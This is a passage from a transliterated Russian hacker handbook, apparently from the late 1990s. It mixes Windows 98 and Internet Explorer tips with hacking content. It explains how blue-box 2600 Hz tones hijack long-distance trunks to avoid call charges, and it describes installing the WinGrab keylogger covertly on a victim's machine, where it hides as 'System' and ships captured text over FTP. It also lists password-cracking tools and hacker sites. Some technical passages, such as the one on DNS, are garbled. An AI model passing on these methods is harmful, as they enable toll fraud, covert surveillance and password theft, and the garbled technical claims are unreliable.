kotorogo hakeru prishlo soobshchenie o tom, chto on novyj pol'zovatel'. Esli
haker udachno prodelaet vse eti procedury, u nego budet dostup v Internet uzhe
cherez pervyj prozvon s CPS do 4000.
Programmu Homegate Dialer haker zagruzhaet s
http://www.homegate.com/howget
Proksi v Microsoft Internet Explorer
S pomoshch'yu razdela Proksi-server vy mozhete podklyuchit'sya k Internet cherez
proksi-server vashej lokal'noj seti. Dlya etogo postav'te flazhok Podklyuchat'sya
k Internetu cherez proksi-server i vvedite v polya dannyh Adres adres
proksi-servera, a v pole dannyh Port zadajte nomer porta.
V obshchem sluchae, obozrevatel' Microsoft Internet Explorer ne trebuet
parametrov blizlezhashchih uzlov ili tak nazyvaemyh proksi-serverov, to est' teh
setevyh sluzhb, cherez kotorye vy neposredstvenno rabotaete s Internet. S
drugoj storony, konfiguraciya nekotoryh setevyh soedinenij blokiruetsya
brandmauerami. Kak izvestno, informaciya zashchishchaetsya brandmauerami v
komp'yuterah vnutrennih setej ot vseobshchego dostupa. Pri etom, brandmauery
mogut ogranichivat' sposobnost' Microsoft Internet Explorer obmenivat'sya
informaciej s vneshnimi istochnikami. CHtoby preodolet' eto ogranichenie,
Microsoft Internet Explorer pozvolyaet vam vzaimodejstvovat' tol'ko s tem
programmnym obespecheniem, kotoroe vam predostavlyaet vash provajder Internet
ili glavnyj server vashej lokal'noj seti. Vse eto delo rabotaet po mudrennoj
sheme.
Proksi-server retransliruet brandmauer i obespechivaet svyaz' s zadannym
protokolom setevoj sluzhby. Poetomu, esli vy zapustili Microsoft Internet
Explorer cherez brandmauer, vam neobhodimo ukazat' nomera logicheskih portov i
associirovat' nomer kazhdogo porta pod sootvetstvuyushchuyu sluzhbu servera. Esli
zhe vy ne hotite ustanavlivat' parametry retranslyatora, prosto snimite flazhok
Podklyuchat'sya k Internetu cherez proksi-server.
Vy mozhete vruchnuyu opredelit' sluzhby i zadat' nomera sootvetstvuyushchih
logicheskih portov vashego proksi-serevera. Dlya etogo nazhmite knopku
Dopolnitel'no i v dialogovom okne Parametry proksi-servera ustanovite
parametry dlya kazhdoj sluzhby Internet i ukazhite servisnye sluzhby, kotorye
podderzhivaet retranslyator. Imi mogut byt':
n HTTP (HyperText Transfer Protocol)
n FTP (File Transfer Protocol)
n Gopher
n Security (Secure Sockets Layer protocol)
n WAIS (Wide Area Information System)
n SOCKS (Sokety)
V polyah dannyh Adres proksi-servera vy dolzhny ukazat' imya hosta dlya
kazhdogo protokola sootvetstvuyushchej sluzhby.
Kak pravilo, odin proksi-server rabotaet s tremya osnovnymi protokolami:
HTTP, FTP i Gopher. V pole dannyh Adres proksi-servera vy takzhe mozhete
vvesti IP-adres proksi-servera.
Na odnom komp'yutere mozhet byt' zapushcheno neskol'ko setevyh sluzhb, kazhdaya
iz kotoryh identificiruetsya logicheskim portom. |tot port prinadlezhit
proksi-serveru, takomu kak HTTP ili FTP. Kak pravilo, v Internet
ispol'zuyutsya standartnye nomera logicheskih portov. Naprimer, protokol HTTP
ispol'zuet 80-j port, a FTP -- 21-j.
Vy mozhete soobshchit' obozrevatelyu, chtoby on ne ispol'zoval parametry
setevyh sluzhb lokal'nogo domena. Naprimer, esli vy opredelite v Adres
proksi-servera bob.leon.com i ukazhite v pole dannyh Isklyucheniya
abob,bbob,leon.com, to vse neobhodimye protokoly HTTP dlya abob, bbob i
leon.com budut ispol'zovat'sya napryamuyu, to est' ignoriruya parametr,
vvedennyj v pole Adres proksi-servera.
Razdel Avtomaticheskaya nastrojka prednaznachen dlya ves'ma prodvinutyh
pol'zovatelej. CHerez knopku Nastrojka proishodit obrashchenie k dialogu
Avtomaticheskaya nastrojka, s pomoshch'yu kotorogo sistemnyj administrator vashej
seti mozhet zagruzit' fajl nastroek Internet Explorer. Kak pravilo, v takoj
fajl vklyuchayutsya nekotorye parametry raboty Internet Explorer, kasayushchiesya
nachal'noj stranicy i nastroek proksi-servera.
Sistema bezopasnosti Microsoft Internet Explorer
V dialogovom okne Svojstva obozrevatelya cherez vkladku Bezoposnost' vy
mozhete ustanovit' parametry raboty s sistemoj bezopasnosti Microsoft
Internet Explorer.
V Microsoft Internet Explorer imeetsya, myagko govorya, nebol'shaya lazejka,
pozvolyayushchaya perekonfigurirovat' ego brandmauer, tak kak vy eto pozhelaete.
Imenno cherez etot preslovutyj brandmauer vy mozhete, naprimer, bez osobogo
truda vakcinirovat' sistemu. Kstati, eto mnogimi i ochen' mnogimi delalos'.
Prichem, vzlom zashchity Microsoft Internet Explorer mozhet byt' osushchestvlen
neskol'kimi sposobami, kazhdyj iz kotoryh sovershenno ne svyazan s predydushchimi.
Microsoft Internet Explorer dazhe ne opredelit togo, kto hotel vzlomat' vashu
sistemu. V etoj programme nevozmozhno opredelit' tak nazyvaemuyu zonu riska.
Poetomu, imenno cherez brandmauery Microsoft Internet Explorer ishchutsya
otpravnye tochki zahvata vsej sistemy. Naprimer, prostejshaya ataka programmoj
rlogin cherez otdel'nyj komp'yuter bol'shoj seti pozvolyaet perecherknut' dvumya
zhirnymi polosami nizhepublikuemoe opisanie opcij sistemy zashchity Microsoft
Internet Explorer.
Izmenenie imeni pol'zovatelya i kompanii v Windows 98
Esli vy hotite izmenit' imya pol'zovatelya i kompanii, otkrojte redaktor
reestra v HKEY_LOCAL_MACHINE/
SOFTWARE/MICROSOFT/WINDOWS. Dvazhdy shchelknite levoj klavishej myshi na
klyuche REGISTERED OWNER ili
REGISTERED ORGINIZATION i prosto vvedite novoe imya.
Ustanovka svyazi po modemu mezhdu dvumya udalennymi komp'yuterami v Windows
98
Esli vy hotite ustanovit' svyaz' po modemu mezhdu dvumya udalennymi
komp'yuterami, to prezhde vsego komp'yuter, s kotorym vy pytaetes' naladit'
svyaz' dolzhen byt' serverom udalennogo dostupa. (Udalennyj dostup k
Soedineniya k Server udalennogo dostupa k Allow caller access).
Teper' sozdajte soedinenie udalennogo dostupa i nazhmite knopku
Ustanovit' svyaz'.
Ustanoviv svyaz', cherez Moj komp'yuter poklyuchite k svoemu komp'yuteru
dostupnyj setevoj disk ishodnogo servera udalennogo dostupa, zadav ego tak:
\\\
HyperTerminal i dva udalennyh komp'yutera v Windows 98
n otkrojte programmu HyperTerminal
n na odnom iz komp'yuterov otmenite zvonok
n ustanovite "soedinenie" s udalennym komp'yuterom
n naberite ATS0=N (N -- kolichestvo zvonkov pered
snyatiem trubki), vash modem pereshel v rezhim ozhidaniya
n teper' drugoj komp'yuter dolzhen nabrat' vash telefonnyj
nomer
Udalenie parolya v Windows 98
Dlya togo, chtoby udalit' parol', najdite fajl s rasshireniem .PWL v papke
Windows, unichtozh'te ego i perezapustite sistemu.
Izmenenie adresa IP bez perezagruzki sistemy v Windows 98
Esli vy hotite izmenit' adres IP bez perezagruzki sistemy, otkrojte v
Redaktore reestra razdel Moj
komp'yuter\HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP i
sohranite etot razdel kak fajl s rasshireniem .REG. Posle etogo izmenite
adres IP, otkrojte Provodnik i zapustite otredaktirovannyj takim obrazom
fajl dvojnym shchelchkom klavishej myshi. Esli na ekrane poyavilos' soobshchenie
"Zapisi uspeshno vneseny v reestr", to vy izmenili adres IP bez perezagruzki
sistemy.
Ustanovka dvuh interfejsov IP na odin setevoj adapter v Windows 98
Esli vy hotite ustanovit' dva interfejsa IP na odin setevoj adapter,
prosto dobav'te eshche odin protokol TCP/IP i nastrojte ego cherez vkladku
Konfiguraciya dialogovogo okna svojstv Set'.
Windows 98 i modem na COM4
Pri pravil'noj ustanovke dzhamperov, sistema sposobna proizvesti
pravil'nuyu konfiguraciyu vashego modema posredstvom tehnologii avtomaticheskogo
raspoznavaniya ustrojstv. No inogda sluchaetsya tak, chto COM-portov ne hvataet,
a vam neobhodimo ustanovit' modem. Togda ostaetsya tol'ko
odno -- podklyuchit' eto ustrojstvo na tretij ili chetvertyj
COM-port. Tut-to vam i nuzhno uchest' odinakovye preryvaniya IRQ.
Naprimer, preryvanie chetvertogo COM-porta mozhet byt' zanyato vashim
videoadapterom, a pervyj COM-port vsegda imeet v otnoshenii preryvanij
bol'shij prioritet po sravneniyu s chetvertym COM-portom.
Esli sistema voobshche ne vidit chetvertyj COM-port, prover'te eshche raz vse
dzhampera i prosto zastav'te Windows 98 obnovit' apparatnuyu bazu dannyh.
Zashchity sistemy v Windows 98
Koncepciya bezopasnosti komp'yutera podrazumevaet zashchitu vseh ego
komponentov -- apparatnye sredstva i prilozheniya -- ot nesankcionirovannogo
dostupa iz lokal'noj seti ili Internet. V Windows 98 lyuboj pol'zovatel'
vashego komp'yutera mozhet zaregistrirovat'sya v sisteme. Pri etom imya
pol'zovatelya i parol' mogut byt' takimi zhe, kak i pri vhode v set'.
Koncepciya bezopasnosti v Windows 98 ves'ma primitivna. V etoj sisteme
vy, kak administrator, ne mozhete sozdat' gruppu pol'zovatelej, zavesti
uchetnuyu zapis' pol'zovatelya, izmenit' prava pol'zovatelya. Vmesto ves'ma
prodvinutogo Dispetchera pol'zovatelej eta sistema predlagaet dovol'no
prosten'koe dialogovoe okno svojstv Paroli.
Vse eto, konechno zhe, oznachaet, chto Windows 98 voobshche ne obespechivaet
nikakogo urovnya bezopasnosti. Vy, kak vladelec sobstvennogo komp'yutera, ne
mozhete upravlyat' sobstvennymi resursam, zavodit' zhurnal sobytij,
ogranichivat' dostup k tomu ili inomu resursu. Vy nichego ne mozhete!
Identifikator pol'zovotelya ID? Net! |ti veshchi mozhno delat' tol'ko v
Windows NT. SID! SID! SID! SID! SID! SID! SID! Zabyt' i vse tut!
Nikakih kodov bezopasnosti! Dostup tol'ko v NT!
Ne vy, a sama sistema mozhet sozdat' nechto, napominayushchee unikal'nuyu
zapis', kotoraya identificiruet togo ili inogo pol'zovatelya vashego
komp'yutera.
Nikakogo kontrolya, ucheta i otslezhivaniya.
Vy, konechno, administrator! No koncepciya bezopasnosti Windows 98 ne
podrazumevaet tot fakt, chto vy imeete zakonnoe pravo rasporyazhat'sya resursami
sobstvennogo komp'yutera.
Rech' idet o tom, chto mehanizm bezaposnosti v Windows 98 realizovan
tol'ko na urovne registracii pol'zovatelya.
Vam predlagaetsya tak nazyvaemaya unificirovannaya registraciya. |to
oznachaet, chto odnazhdy vvedennyj ekkaunt (parol' i imya pol'zovatelya) v okne
registracii pri zagruzke sistemy ispol'zuetsya dlya dostupa ko vsem sluzhbam,
prilozheniyam i apparatnym resursam vashego komp'yutera.
Horosho podobrannyj parol', v principe, sposoben zashchitit' vashu sistemu
ot proniknoveniya v nee nezhdannyh gostej. Poetomu:
n nikogda ne zapisyvajte svoj parol' na bumage
n ne pol'zujtes' ochevidnymi parolyami
(imena, nazvaniya gorodov)
n nikogda ne otpravlyajte svoj parol' po elektronnoj
pochte
n ispol'zujte razumnoe kolichestvo simvolov pri
sostavlenii parolya, inache vy zabudete ego v odin
prekrasnyj moment i ne smozhete izmenit' nikogda
S pomoshch'yu vkladki Smena parolej dialogovogo okna svojstv Paroli, k
kotoromu vy mozhete obratit'sya iz Paneli upravleniya posredstvom dvojnogo
shchelchka klavishej myshi na znachke Paroli, izmenyayutsya parametry unificirovannoj
registracii vseh resursov vashego komp'yutera posredstvom zadaniya novogo
parolya pol'zovatelya.
Zadat' novyj parol' mozhno cherez vkladku Nastrojka pol'zovatelya,
obratit'sya k kotoroj vy mozhete posredstvom dvojnogo shchelchka klavishej myshi na
piktogramme Pol'zovateli, nahodyashchejsya v Paneli upravleniya.
Esli vy hotite ustanovit' zashchitu na tot ili inoj resurs vashego
komp'yutera, naprimer, razdelit' dostup k fajlam i printeram, prezhde vsego,
sdelajte tak, chtoby etot resurs stal razdelyaemym.
Bolee podrobnuyu informaciyu vy mozhete poluchit' u sistemnogo
administratora vashej kompanii.
Windows 98 pozvolyaet upravlyat' resursami vashego komp'yutera
pol'zovatelyam, kotorye imeyut udalennyj dostup k vashej sisteme. Dlya etogo vy
dolzhny dobavit' sootvetstvuyushchuyu sluzhbu s pomoshch'yu vkladki Set', obratit'sya k
kotoroj vy mozhete iz Paneli upravleniya. Tol'ko posle etogo v dialogovom okne
svojstv Paroli poyavitsya novaya vkladka Udalennoe upravlenie.
Naezd na web-mastera
Puteshestvuya po Internet, vy, navernoe, obratili vnimanie na razlichnyj
vid web-stranic. Nekotorye stranicy vyglyadyat ves'ma krasivo i do otkaza
zapolneny nuzhnoj vam informaciej. Drugie -- bezobrazny, otvratitel'ny i
zapolneny, kak pravilo, vsyakoj erundoj. Razrabotkoj i teh i drugih stranic
zanimayutsya pol'zovateli, nazyvayushchie sebya web-dizajnerami ili web-masterami.
Ponyatno, chto horoshij web-dizajn napryamuyu zavisit ot togo, kak pol'zovatel'
vladeet intellektual'noj disciplinoj, nazyvaemoj web-dizajnom.
Esli vy programmist, nikogda ne puskajtes' v avantyury tipa "Razrabotka
web-servera". Pover'te, eto ne dlya vas. Web-dizajn -- eto daleko ne kody
HTML! Imenno na etih samyh kodah zaciklivayutsya mnogie programmisty, zabyvaya
pro
glavnoe -- krasivyj dizajn, funkcional'nost' i soderzhanie.
Professional'nyj dizajn web-stranichek i serverov WWW ne mozhet byt' vypolnen
programmistom.
Zachem vam nuzhen Domain Name Server
Kazhdoe podrazdelenie Internet imeet dva domena. Osnovnoj DNS obychno
raspolagaetsya na setevoj mashine.
DNS-servera ispol'zuyut v svoih obrashcheniyah k udalennym uzlam 32-bitnye
adresa IP, mnemonicheski zaklyuchennye v chetyrehrazryadnuyu bukvennuyu kombinaciyu.
Lyuboj host mozhet poluchit' sootvetstvuyushchij DNS u blizhajshego informacionnogo
servera DNS po izvestnoj sisteme Domain Name Server cherez setevoj protokol
DNS. Prosto host posylaet zapros na izvestnyj IP-adres DNS-servera svoj
IP-adres i imya servera. Server DNS shtudiruet sobstvennuyu bazu dannyh,
nahodit IP-adres i otpravlyaet na host sootvetstvuyushchij otvet DNS. Shema
ves'ma primitivnaya. Esli zhe server DNS ne nahodit iskomuyu bukvennuyu
kombinaciyu, to on otsylaet zapros na tak nazyvaemyj kornevoj server,
kotoryj, v svoyu ochered', sveryaet informaciyu s fajlom nastroek root.cache.
Tak proishodit do teh por, poka imya hosta ne budet najdeno v Internet.
Principy dejstviya BlueBox
Upravlenie priborami na ATS (nabor nomera, sostoyanie linii)
osushchestvlyaetsya postoyanym tokom. Odnako eto spravedlivo tol'ko dlya
abonentskih linij i chastichno -- dlya soedinitel'nyh. V mezhuzlovoj seti, kak i
v mezhdugorodnoj, stoit apparatura uplotneniya kanalov, usileniya signalov i
t.p., kotoraya ne mozhet peredavat' postoyannyj tok. Odnako stancii kak-to
dolzhny signalizirovat' o svoem sostoyanii drug-drugu. Dlya etoj celi primenyayut
razlichnye sistemy signalizacii. Dlya dvuhprovodnoj linii naibolee udobnoj
okazalas' chastotnaya signalizaciya v polose chastot telefonnogo kanala (300 --
3500 Hz), kotoruyu propuskaet oborudovanie usileniya i uplotneniya.
Uzly soedineny mezhdu soboj nekotorym kolichestvom soedinitel'nyh linij.
CHtoby oboznachit', chto uzel ne zanimaet liniyu, on podaet v nee signal
chastotoj 2600 Hz. Na svobodnoj linii etot signal idet s obeih storon (ot
oboih uzlov). Kogda uzel hochet svyazat'sya s drugim uzlom, on dolzhen vybrat'
svobodnuyu liniyu. Dlya etogo oborudovanie prosmatrivaet po ocheredi vse linii
na nalichie signala 2600 Hz, postupayushchego s udalennogo uzla. Nalichie signala
oznachaet, chto liniya svobodna, i uzel podklyuchaetsya k nej. Pri etom on snimaet
signal 2600 Nz so svoej storony, chto oznachaet, chto liniya im zanyata.
S udalennogo uzla signal 2600 Hz vse eshche postupaet v liniyu. Vy ne
slyshite ego, tak kak na ego puti ustanovlen uzkopolosnyj fil'tr,
"vyrezayushchij" etot ton. 2600 budet podavat'sya udalennym uzlom, poka
vyzyvaemyj abonent ne snimet trubku. Nash uzel opoznaet propadanie signala s
udalennogo uzla, kak priznak togo, chto razgovor nachat, i nachinaet
nakruchivat' za nego babki. Po okonchanii razgovora uzel, chej abonent veshaet
trubku, opyat' podaet v liniyu signal 2600 Nz, oznachayushchij, chto dannyj uzel
prekratil razgovor i osvobodil liniyu. Tak rabotaet eta sistema signalizacii.
Teper' predpolozhim, chto vy zvonite drugu v drugoj gorod N. Nabiraete
ego nomer. Vash mezhdugorodnij uzel ishchet svobodnuyu svyaznuyu liniyu, na kotoruyu
iz N podaetsya 2600 Hz. Najdya takuyu liniyu, on soedinyaet vas s nej i ubiraet
so svoej storony signal 2600 Hz. Uzel goroda N ponimaet eto kak zapros
nachat' svyaz'. Dalee vash uzel peredaet uzlu goroda N nomer vashego druga, i vy
nakonec slyshite gudki vyzova. U druga zvonit telefon. Vse eto vremya 2600 iz
goroda N postupaet na vash uzel, poetomu on ne nachislyaet poka den'gi. Teper'
predpolozhim, chto my sami podali v liniyu signal 2600 Hz. Uzel goroda N
"slyshit" etot ton i dumaet, chto vy u sebya povesili trubku, i vash uzel
osvobodil liniyu. Sootvetsvenno on prekrashchaet vyzyvat' vashego druga,
sbrasyvaet i gotovit oborudovanie k novym vyzovam (eto zanimaet ne bolee
sekundy). Teper' vy perestaete podavat' ton 2600 Hz. Uzel goroda N dumaet,
chto s vashego uzla prishel novyj zapros na svyaz', i gotov prinimat' nomer
abonenta. Pri etom, blagodarya zvezdoobraznoj strukture seti, uzel goroda N
mozhet svyazyvat'sya s drugimi gorodami i stranami, esli nabiraemyj nomer
soderzhit kod strany i/ili goroda.
Takim obrazom, pozvoniv snachala v sosednij gorod N i perehvativ
upravlenie set'yu, vy mozhete zvonit' v lyuboe mesto, kuda smozhet "zvonit'"
uzel goroda N. Pri etom vash uzel zaregistriruet tol'ko zvonok v gorod N i
nichego ne budet znat' o dal'nejshih vashih dejstviyah. Znachit, po tarifu
sosednego gorodka vy mozhete zvonit' prakticheski v lyubuyu stanu mira. Zvonok
mozhet byt' i voobshche besplatnym, esli vy snachala nabiraete nomer kakoj-nibud'
vserossijskoj besplatnoj sluzhby.
S®emshchik parolej Wingrab
Ves'ma interesnaya hakerskaya programma WinGrab prednaznachena dlya s®ema
vsyakoj raznoj informacii s komp'yuterov, rabotayushchih pod Windows 95 ili
Windows NT. |ta programma pozvolyaet otslezhivat' soderzhimoe Windows po
goryachim slovam, a takzhe klaviaturnyj vvod. Informaciya sobiraetsya v lokal'nom
fajle ili mozhet byt' peredana cherez Internet na ukazannyj FTP-server.
Poslednyaya versiya WinGrab podderzhivaet tol'ko odno dobavochnoe slovo, no
gramotnoe ego primenenie pomogaet znachitel'no uvelichit' krug snimaemoj
informacii (naprimer dobavochnoe slovo "Subject:" skoree vsego pozvolit imet'
vsyu perepisku donora bez zaglyadyvaniya na ego pochtovyj server). Analogichnoe
primenenie mozhet najti i krakozyabla @.
Sposob zapuska WinGrab na komp'yutere-donore -- ustanovka programmy s
diskety. Programma principial'no ne sdelana ni v vide troyanyaca, ni v vide
virusa, po raznym soobrazheniyam. Odnako ustanovka programmy s diskety
optimizirovana takim obrazom, chto zanimaet vsego ot 10 do 35 sekund v
zavisimosti ot nalichiya na donore neobhodimyh bibliotek.
Buduchi edinozhdy ustanovlena, programma zapuskaetsya kazhdyj raz pri
starte operacionnoj sistemy i vyglyadit v spiske zadach kak System. Popytki
snyat' zadachu System, estestvenno, bezuspeshny, chto vvodit neopytnogo
pol'zovatelya v blagoe zabluzhdenie.
Primer fajla ../etc/passwd
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/nonexistent
operator:*:2:20:System &:/usr/guest/operator:/bin/csh
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:*:7:13:Games pseudo-user:/usr/games:/nonexistent
news:*:8:8:News Subsystem:/:/nonexistent
man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent
uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
ftp:*:14:14:Anonymous FTP Admin:/usr/ftp:/bin/date
Hakerskie konferencii
Otmetim, chto istochnik kazhdoj postupayushchej stat'i registriruetsya. Poetomu
net nikakogo smysla unichtozhat' stat'i UUnet. |to informaciya dlya nachinayushchih
hakerov. A dlya bolee umudrennyh opytom otmetim, chto ne nuzhno zahodit' v
sluchajnye gruppy, metit' stat'i i stirat' soobshcheniya. |to nevezhlivo i
bessmyslenno. Zachem pol'zovat'sya nesovershennymi metodami raboty Usenet?!
alt.2600.hope.tech
Hakery planety Zemlya.
alt.comp.virus
Spory po virusam.
alt.cracks
ZHarkie spory vzlomshchikov setej.
alt.cyberpunk
Uzkij krug kiberpankov.
alt.cyberspace
Kiberprostranstvo i kak v nem rabotat'.
alt.dcom.telecom
Spory otnositel'no telekommunikacij.
alt.fan.lewiz
Fen-klub Levisa De Pajna.
alt.hackers
Opisanie proektov.
alt.hackers.malicious
Dejstvitel'no merzkie tipy.
alt.privacy.anon-server
Anonimnye ataki na razlichnye servera.
alt.radio.pirate
Skrytye mehanizmy.
alt.radio.scanner
Skanirovanie radiogramm.
alt.satellite.tv.europe
Vse otnositel'no evropejskogo televideniya.
alt.security
Bezopasnost' komp'yuternyh setej.
alt.security.keydist
Obmen klyuchami dlya sistem deshifrovki.
alt.security.pgp
Pretty Good Privacy.
alt.security.ripem
Nelegal'naya pochta iz SSHA.
comp.org.cpsr.announce
Komp'yuternye professionaly.
comp.org.cpsr.talk
Samizdatovskie komp'yuternye izdaniya.
comp.org.eff.news
Novosti ot Electronic Frontiers Foundation.
comp.protocols.tcp-ip
Protokoly TCP i IP.
comp.risks
Publikacii i risk.
comp.security.announce
Anonsy ot CERT otnositel'no bezopasnosti.
comp.security.misc
Bezopasnost' setej i komp'yuterov.
comp.security.unix
Diskuscii po zashchite velikoj i moguchej UNIX.
comp.virus
Komp'yuternye virusy i bezopasnost'.
rec.video.cable-tv
Kabel'noe televidenie.
sci.crypt.
Razlichnye metody shifrovki/deshifrovki.
Hakerskie sajty WWW
http://www.outerlimits.net/lordsome/index.html
http://web2.airmail.net/km/hfiles/free.htm
http://resudox.net/bio/novell.html
http://www.louisville.edu/wrbake01/hack2.html
http://www.intersurf.com/~materva/files.html
http://hightop.nrl.navy.mil/rainbow.html
http://www.rit.edu/~jmb8902/hacking.html
http://www.spatz.com/pecos/index.html
http://pages.prodigy.com/FL/dtgz94a/files2.html
http://www.2600.com
http://att.net/dir800
http://draco.centerline.com:8080/~franl/crypto.html
http://everest.cs.ucdavis.edu/Security.html
http://ice-www.larc.nasa.gov/WWW/security.html
http://lOpht.com
http://lOpht.com/~oblivion/IIRG.html
http://underground.org
http://www.alw.nih.gov/WWW/security.html
http://www.aspentec.com/~frzmtdb/fun/hacker.html
http://www.etext.org/Zines
http://www.inderect.com/www/johnk/
http://www.mgmua.com/hackers/index.html
http://www.paranoia.com/mthreat
http://www.paranoia.com/astrostar/fringe.html
http://www.umcc.umich.edu/~doug/virus-faq.html
http://www.wired.com
http://all.net:8080
http://alumni.caltech.edu/~dank/isdn
http://aset.rsoc.rockwell.com
http://aset.rsoc.rockwell.com/exhibit.html
http://att.net/dir800
http://ausg.dartmouth.edu/security.html
http://csbh.mhv.net/dcypher/home.html
http://cs.purdue.edu/coast/coast.html
http://csrc.ncsl.nist.gov
http://daemon.apana.org.au/~longi
http://dhp.com/~pluvius
http://everest.cs.ucdavis.edu/Security.html
http://everest.cs.ucdavis.edu/slides/slides.html
http://ftp.tamu.edu/~abr8030/security.html
http://hightop.nrl.navy.mil/potpourri.html
http://hightop.nrl.navy.mil/rainbow.html
http://info.bellcore.com/BETSI/betsi.html
http://infosec.nosc.mil/infosec.html
http://l0pht.com
http://l0pht.com/~oblivion/IIRG.html
http://matrix.resnet.upenn.edu/rourke
http://mindlink.jolt.com
http://mls.saic.com
http://motserv.indirect.com
http://naic.nasa.gov/fbi/FBI_homepage.html
http://nasirc.hq.nasa.gov
http://obscura.com/~loki/
http://ophie.hughes.american.edu/~ophie
http://oregano.sl.pitt.edu/index.htm
http://pages.ripco.com:8080/~glr/glr.html
http://the-tech.mit.edu
http://ucs.orst.edu:8001/mintro.html
http://underground.org
http://unixg.ubc.ca:780/~jyee
http://w3.gti.net/safety
http://wintermute.itd.nrl.navy.mil/5544.html
http://wiz.plymouth.edu/~jay/underground.html
http://www.2600.com
http://www.8lgm.org
http://www.aads.net
http://www.alw.nih.gov/WWW/security.html
http://www.aus.xanadu.com:70/1/EFA
http://www.ba.com
http://www.bell.com
http://www.brad.ac.uk/~nasmith/index.html
http://www.bst.bls.com
http://www.c3.lanl.gov/~mcn
http://www.cam.org/~gagnon
http://www.cert.dfn.de
http://www.cpsr.org/home
http://www.cs.umd.edu/~lgas
http://www.csd.harris.com/secure_info.html
http://www.csl.sri.com
http://www.datafellows.fi
http://www.dct.ac.uk/~misb3cp/2600/faq.txt
http://www.digicash.com/ecash/ecash-home.html
http://www.dnai.com/~gui/index.html
http://www.eecs.nwu.edu/~jmyers/ids/index.html
http://www.eff.org/papers.html
http://www.emap.co.uk/partners/racal-airtech
http://www.ensta.fr/internet/unix/sys_admin
http://www.etext.org/Zines
http://www.fc.net/defcon
http://www.fedworld.gov
http://www.first.org/first
http://www.gbnet.net/kbridge
http://www.ic.gov
http://www.io.org/~excels
http://www.indirect.com/www/johnk
http://www.magi.com/~vektor/linenoiz.html
http://www.mcs.com/~candyman/under.html
http://www.mpr.ca
http://www.net23.com
http://www.netresponse.com:80/zldf
http://www.nist.gov
http://www.ntt.jp
http://www.pacbell.com
http://www.paranoia.com/astrostar/fringe.html
http://www.paranoia.com/mthreat
http://www.planet.net/onkeld
http://www.primenet.com/~insphrk
http://www.primenet.com/~kludge/haqr.html
http://www.qualcomm.com/cdma/wireless.html
http://www.raptor.com/raptor/raptor.html
http://www.research.att.com
http://www.rsa.com
http://www.satelnet.org/~ccappuc
http://www.seas.upenn.edu/~rourkem
http://www.service.com/cm/uswest/usw1.html
http://www.shore.net/~oz/welcome.html
http://www.spatz.com/pecos/index.html
http://www.spy.org
http://www.sri.com
Hakerskie sajty FTP
ftp.3com.com /pub/Orange-Book
ftp.acns.nwu.edu /pub
ftp.alantec.com /pub/tcpr
ftp.armory.com /pub/user/kmartind
ftp.armory.com /pub/user/swallow
ftp.auscert.org.au /pub
ftp.cs.ruu.nl /pub/SECURITY
ftp.cs.uwm.edu /pub/comp-privacy
ftp.csi.forth.gr /pub/security
ftp.csl.sri.com /pub/nides
ftp.csn.org /mpj
ftp.digex.net /pub/access/dunk
ftp.eff.org /pub/Publications/CuD
ftp.fc.net /pub/deadkat
ftp.fc.net /pub/defcon
ftp.fc.net /pub/defcon/BBEEP
ftp.fc.net /pub/phrack
ftp.funet.fi /pub/doc/CuD
ftp.gate.net /pub/users/laura
ftp.gate.net /pub/users/wakko
ftp.giga.or.at /pub/hacker
ftp.greatcircle.com /pub/firewalls
ftp.IEunet.ie /pub/security
ftp.inoc.dl.nec.com /pub/security
ftp.io.org /pub/users/gmouser
ftp.lava.net /users/oracle/
ftp.lerc.nasa.gov /security
ftp.llnl.gov /pub
ftp.luth.se /pub/unix/security
ftp.mcs.anl.gov /pub/security
ftp.microserve.net /ppp-pop/strata/mac
ftp.near.net /security/archives/phrack
ftp.netcom.com /pub/br/bradleym
ftp.netcom.com /pub/da/daemon9
ftp.netcom.com /pub/fi/filbert
ftp.netcom.com /pub/le/lewiz
ftp.netcom.com /pub/va/vandal
ftp.netcom.com /pub/wt/wtech
ftp.netcom.com /pub/zz/zzyzx
ftp.ocs.mq.edu.au /PC/Crypt
ftp.ox.ac.uk /pub/comp/security
ftp.ox.ac.uk /pub/crypto
ftp.ox.ac.uk /pub/wordlists
ftp.paranoia.com /pub/toneloc
ftp.primenet.com /users/i/insphrk
ftp.primenet.com /users/k/kludge
ftp.primenet.com /users/s/scuzzy
Luchshij hakerskij soft
CHEAT ENGiNE 2.5
Prostaya programma dlya vzloma igr. Sozdaet klassnye i bystrye patchi.
Cheat Machine 2.02
Programma dlya legkogo prohozhdeniya igr. Podderzhka okolo 300 izvestnyh
igr. Solyusheny, taktika, kody, patchi, utility.
CrackAid 3.39
Snyatie zashchity s igr.
Crack Master 2.5
Vzlom zashchit prisoedinitel'nogo tipa s naibolee populyarnyh igr.
Neverlock Spring 95
Vzlom zashchity s bolee 400 igr.
The PATCHER 6.5
Snyatie zashchity ot kopirovaniya s bolee, chem 100 izvestnyh igrushek.
Unlimited Cheats 3.0
Obman luchshih igr mira. Velikolepnyj interfejs. Rabota s mysh'yu.
BRUTE 2.0
Instrumentarij dlya vzloma parolej UNIX.
Claymore 1.0
Instrumentarij dlya vzloma parolej sistemy Microsoft Windows. Po
bol'shomu schetu eta ves'ma udobnaya programma pozvolyaet vzlomat' prakticheski
lyuboj parol'. Trebuet nalichiya standartnoj biblioteki VBRUN300.DLL
Cracker Jack 1.4
Instrumentarij dlya vzloma parolej sistemy UNIX.
Glide
Znamenityj soft dlya vzloma PWL-fajlov sistemy Microsoft Windows.
GUESS 2.1
Eshche odin instrumentarij dlya vzloma parolej sistemy UNIX. Pozvolyaet
podklyuchit' slovar'.
Hades 1.0
Skanirovanie i rasshifrovka parolej.
Killer Cracker 9.5
Prostoj vzlomshchik parolej dlya MS DOS.
NEWHACK 2.0
Soft, pozvolyayushchij obnovlyat' fajl parolej.
PCUPC 2.01
Instrumentarij dlya vzloma parolej sistemy UNIX.
XIT 2.0
Instrumentarij dlya vzloma parolej sistemy UNIX.
CRACKer for ZIP-files 2.0
Vzlomshchik parolej v ZIP-fajlah.
Fast ZIP Cracker 1.4
